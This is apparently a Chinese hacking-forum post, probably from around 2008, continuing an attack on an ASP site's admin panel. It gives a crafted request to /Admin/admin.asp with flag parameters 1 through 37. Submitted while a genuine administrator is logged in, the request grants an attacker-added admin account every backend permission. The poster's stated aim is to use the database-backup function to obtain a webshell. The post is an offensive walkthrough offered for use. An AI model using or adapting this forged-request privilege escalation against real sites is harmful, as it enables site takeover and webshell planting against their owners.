车虫

但是这样加的管理是没后台权限的.
我们进后台无非就是要备份数据库得webshell
我用上面代码..在管理员登陆后台时,运行那个页面.成功添加管理员..并用帐号登陆时.发现是无权限的
经过本地给此用户加权限.并抓包..的信息..构造
http://127.0.0.1/Admin/admin.asp ... Submit=%B8%FC%D0%C2
这样的URL/..是给ID为3的管理员加上..数据处理的所有权限
提交后返回信息

成功信息
管理员更新成功，请记住更新信息。


而如果要把后台所有的权限都加上..就是

flag=1&flag=2&flag=3&flag=4&flag=5&flag=6&flag=7&flag=8&flag=9&flag=10&flag=11&flag=12&flag=13&flag=14&flag=15&flag=16&flag=17&flag=18&flag=19&flag=20&flag=21&flag=22&flag=23&flag=24&flag=25&flag=26&flag=27&flag=28&flag=29&flag=30&flag=31&flag=32&flag=33&flag=34&flag=35&flag=36&flag=37&id=3&Submit=%B8%FC%D0%C2&chkall=on
替换就可以了.
不用表单.直接提交就可以.但前提是管理员登陆了后台.

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料TOP

h4k_b4n[BCT]
荣誉会员